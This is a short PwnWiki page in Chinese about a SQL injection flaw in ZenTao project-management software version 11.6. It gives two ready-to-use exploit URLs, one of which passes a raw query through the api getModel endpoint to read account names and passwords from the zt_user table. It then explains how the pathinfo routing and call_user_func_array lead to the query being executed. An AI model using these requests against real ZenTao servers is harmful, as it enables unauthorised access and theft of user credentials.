禪道11.6 SQL注入漏洞

From PwnWiki
Revision as of 12:28, 9 April 2021 by Pwnwiki (talk | contribs) (Created page with "==漏洞地址== <pre> http://xxx.xxx/zentaopms_11.6/www/api-getModel-user-getRealNameAndEmails-users=admin http://xxx.xxx/zentaopms_11.6/www/api-getModel-api-sql-sql=select+...")
(diff) ← Older revision | Latest revision (diff) | Newer revision → (diff)

漏洞地址

http://xxx.xxx/zentaopms_11.6/www/api-getModel-user-getRealNameAndEmails-users=admin

http://xxx.xxx/zentaopms_11.6/www/api-getModel-api-sql-sql=select+account,password+from+zt_user

漏洞信息

最新版所採用的pathinfo模式:

首先通過傳參確定進入的control文件為api,對應的method為getModel,接著開始對參數進行賦值,其中moduleName為api,methodName=sql,最後的param為sql=select+account,password+from+zt_user,那麼調用了call_user_func_array函數後,會進入到api目錄下的model文件,對應調用其中的sql函數,並通過賦值,將sql變量賦值為select+ account,password+from+zt_user,最後執行query語句。

Retrieved from "https://pwnwiki.com/index.php?title=禪道11.6_SQL注入漏洞&oldid=1294"